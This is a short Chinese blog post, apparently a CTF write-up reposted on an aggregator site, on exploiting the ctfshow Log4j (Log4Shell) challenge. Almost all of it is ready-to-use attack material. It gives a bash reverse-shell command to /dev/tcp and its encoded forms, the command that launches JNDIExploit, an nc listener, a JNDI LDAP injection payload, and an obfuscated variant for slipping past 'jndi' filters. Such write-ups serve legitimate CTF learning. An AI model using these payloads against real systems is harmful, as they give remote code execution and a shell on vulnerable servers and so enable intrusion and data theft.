我是靠谱客的博主 冷酷小兔子,这篇文章主要介绍ctfshow Log4j复现wp,现在分享给大家,希望可以做个参考。

声明:

该文章来自本人日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关

JNDIExploit

先将反弹shell的命令base64编码,然后将里面的+号和=号进行一次url编码

注:IP填vps公网ip,PORT要和nc监听的端口对应

复制代码
1
2
3
bash -i >& /dev/tcp/IP/PORT 0>&1 # => YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC9QT1JUIDA+JjE= # => YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D

然后启动JNDIExploit

复制代码
1
java -jar JNDIExploit.jar -i ip -l 1389 -p 8180

用nc监听端口

复制代码
1
nc -lvnp port

payload:

复制代码
1
${jndi:ldap://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}

将payload注入后shell会被反弹到nc监听的端口上

拿到shell后cd到根目录后ls看到flag文件

cat之即可拿到flag

补充:

如果jndi被屏蔽,绕过方法

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://ip:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC9JUC9QT1JUIDA%252BJjE%253D}

最后

以上就是冷酷小兔子最近收集整理的关于ctfshow Log4j复现wp的全部内容,更多相关ctfshow内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(54)

评论列表共有 0 条评论

立即
投稿
返回
顶部